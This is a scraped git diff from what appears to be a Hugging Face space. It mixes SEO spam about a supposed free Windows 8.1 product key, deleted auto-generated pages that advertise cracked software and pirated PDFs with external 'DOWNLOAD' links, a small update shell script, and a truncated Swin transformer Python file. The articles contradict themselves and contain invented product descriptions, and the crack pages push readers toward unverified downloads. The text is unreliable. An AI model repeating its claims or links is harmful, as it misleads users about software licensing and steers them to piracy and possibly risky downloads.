    freedownloadenwindows8x64dvd915440productkey is not a product key itself, but a way to get one. It is actually a part of a URL that you can use to download a Windows 8.1 disc image (ISO file) from the official Microsoft website. An ISO file is a single file that contains all the data of a CD or DVD.

    -

    By using this URL, you can download the Windows 8.1 ISO file for free, without having to pay anything or provide any personal information. You can then use this ISO file to create a bootable USB or DVD that you can use to install Windows 8.1 on your PC.

    -

    Why do you need freedownloadenwindows8x64dvd915440productkey?

    -

    There are several reasons why you may need freedownloadenwindows8x64dvd915440productkey:

    -
      -
    • You want to upgrade from Windows 7 or 8 to Windows 8.1. Windows 8.1 is an improved version of Windows 8 that offers many new features and enhancements, such as a better user interface, faster performance, more security, and more apps and services.
    • -
    • You want to reinstall Windows 8.1 on your PC. Maybe your PC has been infected by a virus, corrupted by a software error, or damaged by a hardware failure. In these cases, reinstalling Windows 8.1 can help you restore your PC to its original state and fix any problems.
    • -
    • You want to enjoy the features and benefits of Windows 8.1. Windows 8.1 is one of the most popular and widely used operating systems in the world, with millions of users and fans. It offers many advantages over other operating systems, such as compatibility, reliability, versatility, and innovation.
    • -
    -

    How to get freedownloadenwindows8x64dvd915440productkey?

    -

    There are different ways to get freedownloadenwindows8x64dvd915440productkey:

    -
      -
    • From your existing Windows product key sticker or email. If you have already purchased a copy of Windows 7 or 8, you may have received a product key sticker on your PC case or an email with your product key when you bought it online. You can use this product key to download the Windows 8.1 ISO file from Microsoft website using this URL: https://www.microsoft.com/en-us/software-download/windows81 . Just enter your product key and select your language and edition.
    • -
    • From a third-party website or software. There are some websites or software that claim to offer free or cheap product keys for Windows 8.1 or other software. However, these are usually illegal, unreliable, or risky sources that may contain viruses, malware, or scams. We do not recommend using them as they may harm your PC or compromise your privacy.
    • -
    • From Microsoft website using a valid email address. This is the easiest and safest way to get freedownloadenwindows8x64dvd915440productkey without having to pay anything or provide any personal information. All you need is a valid email address that you can access later.
    • -
    -

    How to use freedownloadenwindows8x64dvd915440productkey?

    -

    To use freedownloadenwindows8x64dvd915440productkey, follow these steps:

    -
      -
    1. To download the Windows 8.1 ISO file from Microsoft website, go to this URL: https://www.microsoft.com/en-us/software-download/windows81 . Click on "Download tool now" and save the file on your PC.
    2. -
    3. Run the file and accept the license terms.
    4. -
    5. Select "Create installation media for another PC" and click "Next".
    6. -
    7. Select your language, edition, and architecture (32-bit or 64-bit) for Windows 8.1 and click "Next".
    8. -
    9. Select "ISO file" as the media type and click "Next". Choose a location where you want to save the ISO file and click "Save". The download will start and may take some time depending on your internet speed.
    10. -
    11. To create a bootable USB or DVD using the ISO file, you will need another tool called "Windows USB/DVD Download Tool". You can download it from here: https://www.microsoft.com/en-us/download/windows-usb-dvd-download-tool . Install it on your PC.
    12. -
    13. Run the tool and browse for the ISO file that you downloaded earlier.
    14. -
    15. Select "USB device" or "DVD" as the media type depending on what you want to use.
    16. -
    17. If you choose USB device, make sure you have inserted a blank USB flash drive with at least 4 GB of space into your PC's USB port.
    18. -
    19. If you choose DVD, make sure you have inserted a blank DVD into your PC's DVD burner.
    20. -
    21. Select your USB device or DVD from the drop-down menu and click "Begin copying". The tool will format your USB device or DVD and copy the files from the ISO file onto it.
    22. -
    23. To install Windows 8.1 on your PC using the product key, make sure your PC is turned off.
    24. -
    25. If you are using a USB device, plug it into your PC's USB port.
    26. -
    27. If you are using a DVD, insert it into your PC's DVD drive.
    28. -
    29. Turn on your PC and press the appropriate key (usually F12) to enter the boot menu.
    30. -
    31. Select your USB device or DVD as the boot option and press Enter.
    32. -
    33. The installation process will start automatically.
    34. -
    35. Follow the instructions on the screen until you reach the activation screen.
    36. -
    37. Enter your product key when prompted and click "Next".
    38. -
    39. Your installation is complete! Enjoy Windows 8.1 on your PC.

      What are the features of Windows 8.1?

      -

      Windows 8.1 is an improved version of Windows 8 that offers many new features and enhancements, such as:

      -
        -
      • Improved user interface and customization options. Windows 8.1 allows you to personalize your Start screen with more tiles, colors, and backgrounds. You can also use the desktop mode with the familiar taskbar and Start button. You can also switch between apps and snap them side by side using the new multitasking features.
      • -
      • Enhanced performance and security. Windows 8.1 runs faster and smoother than Windows 8, with better battery life and less memory usage. It also has more security features, such as Windows Defender, SmartScreen, and BitLocker, that protect your PC from viruses, malware, and hackers.
      • -
      • Support for 3D printing, ReFS, and DirectX 11.2. Windows 8.1 supports the latest technologies and innovations, such as 3D printing, which allows you to create physical objects from digital models. It also supports ReFS, a new file system that improves data integrity and resilience. It also supports DirectX 11.2, a graphics API that enhances gaming and multimedia performance.
      • -
      • New and updated apps and services. Windows 8.1 comes with many new and updated apps and services, such as Skype, Mail, Calendar, Photos, Music, Video, Bing, Store, and more. You can also access your files and settings from anywhere using OneDrive, a cloud storage service that integrates with Windows 8.1.
      • -
      -

      How to activate Windows 8.1?

      -

      To activate Windows 8.1, you need to use your product key that you obtained earlier. There are different ways to activate Windows 8.1:

      -


      -
        -
      • Using an internet connection. This is the easiest and fastest way to activate Windows 8.1. All you need is a stable internet connection and your product key. Just follow the instructions on the screen when you install Windows 8.1 or when you are prompted to activate it later.
      • -
      • By phone. If you don't have an internet connection or if you have problems activating online, you can use the phone option to activate Windows 8.1. You will need to call a toll-free number and provide your installation ID (a series of numbers displayed on your screen) and your product key. You will then receive a confirmation ID (another series of numbers) that you need to enter on your screen to complete the activation.
      • -
    • Via command prompt. If you are an advanced user or if you have problems activating online or by phone, you can use the command prompt option to activate Windows 8.1. You will need to open an elevated command prompt (right-click on the Start button and select "Command Prompt (Admin)") and type the following command: slmgr.vbs -ipk XXXXX-XXXXX-XXXXX-XXXXX-XXXXX (replacing the Xs with your 25-character product key). Then press Enter. You will see a message saying that your product key has been installed successfully. Then type the following command: slmgr.vbs -ato. Then press Enter again. You will see a message saying that your product has been activated successfully.
      • -
      -

      FAQ

      -

      Here are some frequently asked questions about Windows 8.1:

      -
        -
      1. What is the difference between Windows 8 and Windows 8.1?
        Windows 8.1 is an updated version of Windows 8 that offers many improvements and new features over its predecessor. Some of the main differences are: a better user interface with more customization options; enhanced performance and security; support for 3D printing, ReFS, and DirectX 11.2; new and updated apps and services; and more.
      2. -
      3. How can I check if my PC is compatible with Windows 8.1?
        You can use the Windows Compatibility Center to check if your PC meets the minimum system requirements for Windows 8.1 and if your hardware and software are compatible with it. You can access it from here: https://www.microsoft.com/en-us/windows/compatibility/CompatCenter/Home . You can also use the Upgrade Assistant tool that comes with the Windows 8.1 ISO file to check your PC's compatibility before installing it.
      4. -
      5. How can I update my drivers and software for Windows 8.1?
        You can use the Device Manager to check if your drivers are up to date and to update them if needed. You can access it from the Control Panel or by right-clicking on the Start button and selecting "Device Manager". You can also use the Windows Update service to check for updates for your drivers and software automatically. You can access it from the Settings app or by typing "update" in the search box on the Start screen.
      6. -
      7. How can I troubleshoot common problems with Windows 8.1?
        You can use the Troubleshooting tool to diagnose and fix common problems with Windows 8.1, such as network issues, audio issues, printer issues, etc. You can access it from the Control Panel or by typing "troubleshoot" in the search box on the Start screen.
      8. -
      9. How can I contact Microsoft support for Windows 8.1?
        You can contact Microsoft support for Windows 8.1 by phone, chat, email, or online forums depending on your issue and preference. You can find more information about how to contact Microsoft support from here: https://support.microsoft.com/en-us/contactus/windows/ .
      10. -
      -

      Conclusion

      -

      In conclusion, freedownloadenwindows8x64dvd915440productkey is a way to get a product key for Windows 8.1 operating system without having to pay anything or provide any personal information.

      -

      You can use this product key to download a Windows 8.1 ISO file from Microsoft website for free and create a bootable USB or DVD for installing Windows 8.1 on your PC.

      -

      Windows 8.1 is an improved version of Windows 8 that offers many new features and enhancements that make it one of the best operating systems in the world.

      -

      To activate Windows 8.1, you need to use your product key either online, by phone, or via command prompt.

      -

      If you have any questions or problems with Windows 8.1, you can use various tools and resources to troubleshoot them or contact Microsoft support for assistance.

      -

      We hope this article has helped you understand what freedownloadenwindows8x64dvd915440productkey is and how to use it.

      -

      If you liked this article, please share it with your friends and family who may find it useful.

      -

      -
      -
      \ No newline at end of file diff --git a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Amibroker560crack _HOT_rar.md b/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Amibroker560crack _HOT_rar.md deleted file mode 100644 index b2a56763045072f9d9b229ee828b6f1aa0e2066a..0000000000000000000000000000000000000000 --- a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Amibroker560crack _HOT_rar.md +++ /dev/null @@ -1,6 +0,0 @@ -

      amibroker560crackrar


      Download ✵✵✵ https://urlgoal.com/2uCKnP



      -
      -
      -

      diff --git a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Corel PhotoMirage 3.2.3.168 Cracked 64 Bit.md b/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Corel PhotoMirage 3.2.3.168 Cracked 64 Bit.md deleted file mode 100644 index 6d8c8043a7d617e91a5633fb5b9494cfc7111ad1..0000000000000000000000000000000000000000 --- a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Corel PhotoMirage 3.2.3.168 Cracked 64 Bit.md +++ /dev/null @@ -1,62 +0,0 @@ -

      Corel PhotoMirage 3.2.3.168 Cracked 64 Bit


      DOWNLOAD ····· https://urlgoal.com/2uCJJ9



      -
      Available on

      Software support of CGRAW

      CGRAW is fully compatible with PhotoShop®. Furthermore, it is developed to work under both Mac and Windows, so it is possible to install it either on a Mac or on a PC.

      Software users will notice that CGRAW and PhotoShop® do not share the same functions. However, if you need to create your images, use the functions available in CGRAW and find the complementary functions in PhotoShop®.

      Be careful when installing CGRAW: this software is no longer updated and is no longer compatible with Windows Vista and Windows XP.

      This product is provided for non-commercial use only. You have a licence to install this software on up to two computers (1 laptop and 1 desktop). If you want to install it on more computers, you must purchase an additional CGRAW licence.

      You can export all your image files to open them in other applications, send them to your printer, etc. You can easily merge several CGRAW layers (up to 50) into one single image. The layer editor is very useful for avoiding colour errors.

      CGRAW is developed in France by Jean-Paul Combalet, CEO of the company. He has been interested in computer graphics since the 1980s, and he started CGRAW to build a complete work environment in the field of computer graphics.

      Purchasing a CGRAW licence: after buying a licence, you will be able to install and run the software using the licence key given to you by the licence vendor. You can install multiple licences of CGRAW on one computer.

      List of CGRAW licences and activation codes:

      - 30-day trial period
      - CGRAW Professional: 35.00 €
      - CGRAW Professional Tour: 90-day trial period
      - CGRAW Edition: 45.00 €
      - CGRAW Edition Tour: 60.00 €
      -
      -
      -

      diff --git a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Darwin Ortiz At The Card Table Pdf Download 2021.md b/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Darwin Ortiz At The Card Table Pdf Download 2021.md deleted file mode 100644 index 0e20b935a6e9b971aa6942c7ba1f4e8b39684335..0000000000000000000000000000000000000000 --- a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Darwin Ortiz At The Card Table Pdf Download 2021.md +++ /dev/null @@ -1,51 +0,0 @@ -
      -

      Darwin Ortiz at the Card Table: A Review

      -

      If you are interested in learning card magic and gambling routines from one of the best card handlers in the world, you should definitely check out Darwin Ortiz at the Card Table. This book, published in 1988, is a classic in the field of card table artifice and contains 104 entries covering sleights, techniques, effects and theory.

      -

      Darwin Ortiz At The Card Table Pdf Download


      DOWNLOAD ✏ ✏ ✏ https://urlgoal.com/2uCKHl



      -

      The book is divided into four sections: Card Table Artifice, Pure Magic, Gambling Demonstrations and Theories and Essays. In each section, you will find a wealth of information and advice from Darwin Ortiz, who is widely regarded as a master of card manipulation and deception. You will learn how to perform false deals, shuffles, cuts, switches, palms, controls and more. You will also learn how to apply these skills to create stunning effects such as finding cards at any number, locating multiple selections, dealing winning poker hands and exposing card cheats.

      -

      One of the most impressive features of this book is the level of detail and clarity that Darwin Ortiz provides for each move and effect. He explains not only how to do something, but also why to do it, when to do it and what to avoid. He also gives tips on timing, misdirection, presentation and psychology. The book is illustrated with photographs and drawings by Richard Kaufman, who is also a renowned card expert and author.

      -

      Darwin Ortiz at the Card Table is not a book for beginners. It assumes that you have some basic knowledge of card handling and terminology. It also requires a lot of practice and dedication to master the material. However, if you are willing to put in the effort, you will be rewarded with a deeper understanding of card magic and gambling routines, as well as a higher level of skill and confidence.

      -

      You can download a PDF version of Darwin Ortiz at the Card Table from various online sources. However, we recommend that you buy a hardcover copy from a reputable magic dealer or publisher. This way, you will support the author and the magic community, as well as enjoy a better reading experience.

      -

      Darwin Ortiz at the Card Table is a book that every serious card enthusiast should have in their library. It is a timeless classic that will teach you how to perform card magic and gambling routines with elegance, finesse and deception.

      -

      -

      What You Will Learn from Darwin Ortiz at the Card Table

      -

      Darwin Ortiz at the Card Table is not just a collection of tricks and techniques. It is also a valuable source of knowledge and wisdom from one of the most respected card experts in the world. Darwin Ortiz shares his insights and opinions on various topics related to card magic and gambling, such as:

      -
        -
      • The difference between card table artifice and pure magic, and why they require different approaches and skills.
      • -
      • The importance of naturalness, simplicity and elegance in card handling, and how to achieve them.
      • -
      • The principles of deception, misdirection and psychology, and how to apply them effectively.
      • -
      • The ethics of card magic and gambling, and how to deal with cheaters, hecklers and spectators.
      • -
      • The history and evolution of card magic and gambling, and how to appreciate the contributions of past masters.
      • -
      -

      By reading Darwin Ortiz at the Card Table, you will not only learn how to perform amazing card magic and gambling routines, but also how to think like a card magician and a card cheat. You will develop a deeper understanding of the art and science of card manipulation, and a greater appreciation of the beauty and mystery of cards.

      - -

      Why You Should Read Darwin Ortiz at the Card Table

      -

      If you are serious about card magic and gambling, you owe it to yourself to read Darwin Ortiz at the Card Table. This book is widely considered as one of the best books ever written on the subject, and has influenced many generations of card magicians and gamblers. Here are some of the reasons why you should read this book:

      -
        -
      • It is written by Darwin Ortiz, who is a legend in the field of card magic and gambling. He has over 50 years of experience as a performer, teacher, author and consultant. He has performed for celebrities, royalty, presidents and casinos. He has written several books and produced several videos on card magic and gambling. He is recognized as one of the most authoritative and respected voices in the card world.
      • -
      • It contains some of the most powerful and elegant card magic and gambling routines ever created. You will learn how to perform effects that will astonish and impress any audience, whether they are laymen or magicians. You will also learn how to create your own effects using the principles and techniques taught in the book.
      • -
      • It teaches you more than just tricks and techniques. It also teaches you how to be a better card magician and gambler. You will learn how to improve your presentation, timing, misdirection, psychology, ethics, history and theory. You will also learn how to adapt your skills to different situations and environments.
      • -
      • It is a classic that has stood the test of time. The book was first published in 1988, but it is still relevant and useful today. The tricks and techniques are timeless and universal. The insights and opinions are still valid and valuable. The book has been praised by many experts and reviewers as one of the best books ever written on card magic and gambling.
      • -
      -

      Darwin Ortiz at the Card Table is a book that every serious card enthusiast should read at least once in their lifetime. It is a book that will challenge you, inspire you, educate you and entertain you. It is a book that will change your perspective on card magic and gambling forever.

      -

      How to Download Darwin Ortiz at the Card Table

      -

      If you want to download a PDF version of Darwin Ortiz at the Card Table, you have several options. You can search for the book on various online platforms, such as Google, Amazon, Scribd, DocPlayer and others. However, you should be careful about the quality and legality of the files you download. Some of them may be incomplete, corrupted, outdated or pirated.

      -

      A better option is to buy a digital copy of the book from a reputable magic dealer or publisher. This way, you will get a high-quality and legal PDF file that you can read on your computer, tablet or smartphone. You will also support the author and the magic community, as well as get access to other benefits such as updates, bonuses and discounts.

      -

      Here are some of the places where you can buy a digital copy of Darwin Ortiz at the Card Table:

      -
        -
      • Vanishing Inc. Magic: This is one of the leading online magic shops in the world. They offer a wide range of magic products, including books, videos, downloads and accessories. They also have a blog, a podcast and a magazine. You can buy Darwin Ortiz at the Card Table from their website for $49.99.
      • -
      • Kaufman and Greenberg: This is the original publisher of Darwin Ortiz at the Card Table. They specialize in publishing high-quality books on magic and gambling. They also sell other products by Darwin Ortiz, such as his videos, DVDs and lecture notes. You can buy Darwin Ortiz at the Card Table from their website for $50.
      • -
      • L&L Publishing: This is another well-known publisher of magic books and videos. They have a large catalog of products by many famous magicians and authors. They also offer free shipping on orders over $100. You can buy Darwin Ortiz at the Card Table from their website for $50.
      • -
      -

      No matter which option you choose, you will get a PDF file that you can download instantly after your purchase. You will also get an email confirmation with your order details and a link to download your file. You can then enjoy reading Darwin Ortiz at the Card Table on your preferred device.

      - -

      Conclusion

      -

      Darwin Ortiz at the Card Table is a must-read book for anyone who wants to learn card magic and gambling routines from one of the best card handlers in the world. It contains 104 entries covering sleights, techniques, effects and theory that will teach you how to perform card table artifice and pure magic with elegance, finesse and deception.

      -

      You can download a PDF version of Darwin Ortiz at the Card Table from various online sources, but we recommend that you buy a digital copy from a reputable magic dealer or publisher. This way, you will get a high-quality and legal PDF file that you can read on your computer, tablet or smartphone. You will also support the author and the magic community, as well as enjoy a better reading experience.



      \ No newline at end of file diff --git a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Download Spiderman 3 Pc Game Cracktrmdsfl.md b/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Download Spiderman 3 Pc Game Cracktrmdsfl.md deleted file mode 100644 index 7077209ecfd1855d5634cb475ffcc60d8bd9d18b..0000000000000000000000000000000000000000 --- a/spaces/recenWmenso/ChatGPT-with-Voice-Cloning-for-All/datasets/Download Spiderman 3 Pc Game Cracktrmdsfl.md +++ /dev/null @@ -1,31 +0,0 @@ - -

      Spiderman 3 PC Game Trmdsfl: A Review

      -

      If you are a fan of the Spiderman movies and comics, you might be interested in playing Spiderman 3 PC Game Trmdsfl. This is a fan-made modification of the original Spiderman 3 PC game that adds new features, missions, characters, and graphics. In this article, we will review the game and tell you why you should give it a try.

      -

      Download Spiderman 3 Pc Game Cracktrmdsfl


      DOWNLOADhttps://urlgoal.com/2uCKUg



      -

      What is Spiderman 3 PC Game Trmdsfl?

      -

      Spiderman 3 PC Game Trmdsfl is a mod that was created by a group of Spiderman enthusiasts who wanted to improve the original game and make it more faithful to the movie and comic book source material. The mod was released in 2020 and has been downloaded by thousands of players around the world. Some of the main features of the mod are:

      -
        -
      • A new storyline that follows the events of the movie more closely and includes new scenes and dialogues.
      • -
      • New playable characters such as Venom, Sandman, New Goblin, and Black Cat.
      • -
      • New costumes and suits for Spiderman, such as the black suit, the iron spider suit, and the classic red and blue suit.
      • -
      • New abilities and moves for Spiderman, such as web swinging, wall crawling, web zipping, web strike, web pull, web throw, and more.
      • -
      • New enemies and bosses, such as Lizard, Rhino, Scorpion, Electro, Kraven, Vulture, and more.
      • -
      • New locations and environments, such as the Daily Bugle, Oscorp Tower, Central Park, Times Square, Brooklyn Bridge, and more.
      • -
      • New graphics and sound effects that enhance the realism and immersion of the game.
      • -
      -

      How to Download and Install Spiderman 3 PC Game Trmdsfl?

      -

      To play Spiderman 3 PC Game Trmdsfl, you need to have the original Spiderman 3 PC game installed on your computer. You can buy it from Steam or other online platforms. Then, you need to download the mod from its official website or from other trusted sources. The mod comes in a zip file that you need to extract to your game folder. After that, you can launch the game and enjoy the mod.
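      Assuming the mod really does ship as a plain zip archive, the extraction step above can be sketched in Python. This is only an illustration: the function name and both paths are placeholders, not anything provided by the mod itself, and you would point them at your own download and game installation.

```python
# Hypothetical sketch of the "extract the mod zip into your game folder" step.
# Both paths are placeholders -- substitute your own mod archive and game directory.
import zipfile
from pathlib import Path


def install_mod(mod_zip: str, game_dir: str) -> list[str]:
    """Extract every file from the mod archive into the game directory.

    Returns the list of extracted member names so the caller can see
    what was copied.
    """
    game_path = Path(game_dir)
    if not game_path.is_dir():
        raise FileNotFoundError(f"Game folder not found: {game_dir}")
    with zipfile.ZipFile(mod_zip) as archive:
        archive.extractall(game_path)
        return archive.namelist()
```

      After running something like `install_mod("Spiderman3_Trmdsfl.zip", "C:/Games/Spiderman 3")` (paths illustrative), the mod files sit alongside the original game files and you launch the game normally.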

      -

      What are the Pros and Cons of Spiderman 3 PC Game Trmdsfl?

      -

      Spiderman 3 PC Game Trmdsfl is a great mod that offers a lot of fun and entertainment for Spiderman fans. However, it also has some drawbacks that you should be aware of before playing it. Here are some of the pros and cons of the mod:

      - - - - - - -
      ProsCons
      - More content and variety than the original game.- Some bugs and glitches that may affect the gameplay.
      - More faithful to the movie and comic book source material.- Some missions and scenes may be too difficult or frustrating.
      - More customization options for Spiderman.- Some characters and costumes may not look or sound authentic.
      - More realistic and immersive graphics and sound effects.- Some locations and environments may not be fully detailed or interactive.
      -

      Conclusion

      -

      Spiderman 3 PC Game Trmdsfl is a mod that enhances the original Spiderman 3 PC game and makes it more enjoyable for Spiderman fans. It adds new features, missions, characters, graphics, and more that make the game more diverse and faithful to the movie and comic book source material. If you are looking for a new way to experience Spiderman 3 on your PC, you should definitely check out this mod. You can download it from its official website or from other trusted sources. Have fun!

      -

      \ No newline at end of file diff --git a/spaces/rfrossard/Image-and-3D-Model-Creator/PIFu/lib/model/__init__.py b/spaces/rfrossard/Image-and-3D-Model-Creator/PIFu/lib/model/__init__.py deleted file mode 100644 index 6709327c4ef99c510a6dbe3ec9fec57a47bb9245..0000000000000000000000000000000000000000 --- a/spaces/rfrossard/Image-and-3D-Model-Creator/PIFu/lib/model/__init__.py +++ /dev/null @@ -1,5 +0,0 @@ -from .BasePIFuNet import BasePIFuNet -from .VhullPIFuNet import VhullPIFuNet -from .ConvPIFuNet import ConvPIFuNet -from .HGPIFuNet import HGPIFuNet -from .ResBlkPIFuNet import ResBlkPIFuNet diff --git a/spaces/riyueyiming/gpt/run_macOS.command b/spaces/riyueyiming/gpt/run_macOS.command deleted file mode 100644 index 62af07283093d8e580763d7acfe493c3d88e7b08..0000000000000000000000000000000000000000 --- a/spaces/riyueyiming/gpt/run_macOS.command +++ /dev/null @@ -1,25 +0,0 @@ -#!/bin/bash - -# 获取脚本所在目录 -script_dir=$(dirname "$0") - -# 将工作目录更改为脚本所在目录 -cd "$script_dir" - -# 检查Git仓库是否有更新 -git remote update -pwd - -if ! git status -uno | grep 'up to date' > /dev/null; then - # 如果有更新,关闭当前运行的服务器 - pkill -f ChuanhuChatbot.py - - # 拉取最新更改 - git pull - - # 安装依赖 - pip3 install -r requirements.txt - - # 重新启动服务器 - nohup python3 ChuanhuChatbot.py & -fi diff --git a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/backbones/swin.py b/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/backbones/swin.py deleted file mode 100644 index b8eccfca195f5d76865d10d7220546eb297ecc99..0000000000000000000000000000000000000000 --- a/spaces/rockeycoss/Prompt-Segment-Anything-Demo/mmdet/models/backbones/swin.py +++ /dev/null @@ -1,772 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. 
-import warnings -from collections import OrderedDict -from copy import deepcopy - -import torch -import torch.nn as nn -import torch.nn.functional as F -import torch.utils.checkpoint as cp -from mmcv.cnn import build_norm_layer, constant_init, trunc_normal_init -from mmcv.cnn.bricks.transformer import FFN, build_dropout -from mmcv.cnn.utils.weight_init import trunc_normal_ -from mmcv.runner import BaseModule, ModuleList, _load_checkpoint -from mmcv.utils import to_2tuple - -from ...utils import get_root_logger -from ..builder import BACKBONES -from ..utils.ckpt_convert import swin_converter -from ..utils.transformer import PatchEmbed, PatchMerging - - -class WindowMSA(BaseModule): - """Window based multi-head self-attention (W-MSA) module with relative - position bias. - - Args: - embed_dims (int): Number of input channels. - num_heads (int): Number of attention heads. - window_size (tuple[int]): The height and width of the window. - qkv_bias (bool, optional): If True, add a learnable bias to q, k, v. - Default: True. - qk_scale (float | None, optional): Override default qk scale of - head_dim ** -0.5 if set. Default: None. - attn_drop_rate (float, optional): Dropout ratio of attention weight. - Default: 0.0 - proj_drop_rate (float, optional): Dropout ratio of output. Default: 0. - init_cfg (dict | None, optional): The Config for initialization. - Default: None. 
- """ - - def __init__(self, - embed_dims, - num_heads, - window_size, - qkv_bias=True, - qk_scale=None, - attn_drop_rate=0., - proj_drop_rate=0., - init_cfg=None): - - super().__init__() - self.embed_dims = embed_dims - self.window_size = window_size # Wh, Ww - self.num_heads = num_heads - head_embed_dims = embed_dims // num_heads - self.scale = qk_scale or head_embed_dims**-0.5 - self.init_cfg = init_cfg - - # define a parameter table of relative position bias - self.relative_position_bias_table = nn.Parameter( - torch.zeros((2 * window_size[0] - 1) * (2 * window_size[1] - 1), - num_heads)) # 2*Wh-1 * 2*Ww-1, nH - - # About 2x faster than original impl - Wh, Ww = self.window_size - rel_index_coords = self.double_step_seq(2 * Ww - 1, Wh, 1, Ww) - rel_position_index = rel_index_coords + rel_index_coords.T - rel_position_index = rel_position_index.flip(1).contiguous() - self.register_buffer('relative_position_index', rel_position_index) - - self.qkv = nn.Linear(embed_dims, embed_dims * 3, bias=qkv_bias) - self.attn_drop = nn.Dropout(attn_drop_rate) - self.proj = nn.Linear(embed_dims, embed_dims) - self.proj_drop = nn.Dropout(proj_drop_rate) - - self.softmax = nn.Softmax(dim=-1) - - def init_weights(self): - trunc_normal_(self.relative_position_bias_table, std=0.02) - - def forward(self, x, mask=None): - """ - Args: - - x (tensor): input features with shape of (num_windows*B, N, C) - mask (tensor | None, Optional): mask with shape of (num_windows, - Wh*Ww, Wh*Ww), value should be between (-inf, 0]. 
- """ - B, N, C = x.shape - qkv = self.qkv(x).reshape(B, N, 3, self.num_heads, - C // self.num_heads).permute(2, 0, 3, 1, 4) - # make torchscript happy (cannot use tensor as tuple) - q, k, v = qkv[0], qkv[1], qkv[2] - - q = q * self.scale - attn = (q @ k.transpose(-2, -1)) - - relative_position_bias = self.relative_position_bias_table[ - self.relative_position_index.view(-1)].view( - self.window_size[0] * self.window_size[1], - self.window_size[0] * self.window_size[1], - -1) # Wh*Ww,Wh*Ww,nH - relative_position_bias = relative_position_bias.permute( - 2, 0, 1).contiguous() # nH, Wh*Ww, Wh*Ww - attn = attn + relative_position_bias.unsqueeze(0) - - if mask is not None: - nW = mask.shape[0] - attn = attn.view(B // nW, nW, self.num_heads, N, - N) + mask.unsqueeze(1).unsqueeze(0) - attn = attn.view(-1, self.num_heads, N, N) - attn = self.softmax(attn) - - attn = self.attn_drop(attn) - - x = (attn @ v).transpose(1, 2).reshape(B, N, C) - x = self.proj(x) - x = self.proj_drop(x) - return x - - @staticmethod - def double_step_seq(step1, len1, step2, len2): - seq1 = torch.arange(0, step1 * len1, step1) - seq2 = torch.arange(0, step2 * len2, step2) - return (seq1[:, None] + seq2[None, :]).reshape(1, -1) - - -class ShiftWindowMSA(BaseModule): - """Shifted Window Multihead Self-Attention Module. - - Args: - embed_dims (int): Number of input channels. - num_heads (int): Number of attention heads. - window_size (int): The height and width of the window. - shift_size (int, optional): The shift step of each window towards - right-bottom. If zero, act as regular window-msa. Defaults to 0. - qkv_bias (bool, optional): If True, add a learnable bias to q, k, v. - Default: True - qk_scale (float | None, optional): Override default qk scale of - head_dim ** -0.5 if set. Defaults: None. - attn_drop_rate (float, optional): Dropout ratio of attention weight. - Defaults: 0. - proj_drop_rate (float, optional): Dropout ratio of output. - Defaults: 0. 
- dropout_layer (dict, optional): The dropout_layer used before output. - Defaults: dict(type='DropPath', drop_prob=0.). - init_cfg (dict, optional): The extra config for initialization. - Default: None. - """ - - def __init__(self, - embed_dims, - num_heads, - window_size, - shift_size=0, - qkv_bias=True, - qk_scale=None, - attn_drop_rate=0, - proj_drop_rate=0, - dropout_layer=dict(type='DropPath', drop_prob=0.), - init_cfg=None): - super().__init__(init_cfg) - - self.window_size = window_size - self.shift_size = shift_size - assert 0 <= self.shift_size < self.window_size - - self.w_msa = WindowMSA( - embed_dims=embed_dims, - num_heads=num_heads, - window_size=to_2tuple(window_size), - qkv_bias=qkv_bias, - qk_scale=qk_scale, - attn_drop_rate=attn_drop_rate, - proj_drop_rate=proj_drop_rate, - init_cfg=None) - - self.drop = build_dropout(dropout_layer) - - def forward(self, query, hw_shape): - B, L, C = query.shape - H, W = hw_shape - assert L == H * W, 'input feature has wrong size' - query = query.view(B, H, W, C) - - # pad feature maps to multiples of window size - pad_r = (self.window_size - W % self.window_size) % self.window_size - pad_b = (self.window_size - H % self.window_size) % self.window_size - query = F.pad(query, (0, 0, 0, pad_r, 0, pad_b)) - H_pad, W_pad = query.shape[1], query.shape[2] - - # cyclic shift - if self.shift_size > 0: - shifted_query = torch.roll( - query, - shifts=(-self.shift_size, -self.shift_size), - dims=(1, 2)) - - # calculate attention mask for SW-MSA - img_mask = torch.zeros((1, H_pad, W_pad, 1), device=query.device) - h_slices = (slice(0, -self.window_size), - slice(-self.window_size, - -self.shift_size), slice(-self.shift_size, None)) - w_slices = (slice(0, -self.window_size), - slice(-self.window_size, - -self.shift_size), slice(-self.shift_size, None)) - cnt = 0 - for h in h_slices: - for w in w_slices: - img_mask[:, h, w, :] = cnt - cnt += 1 - - # nW, window_size, window_size, 1 - mask_windows = 
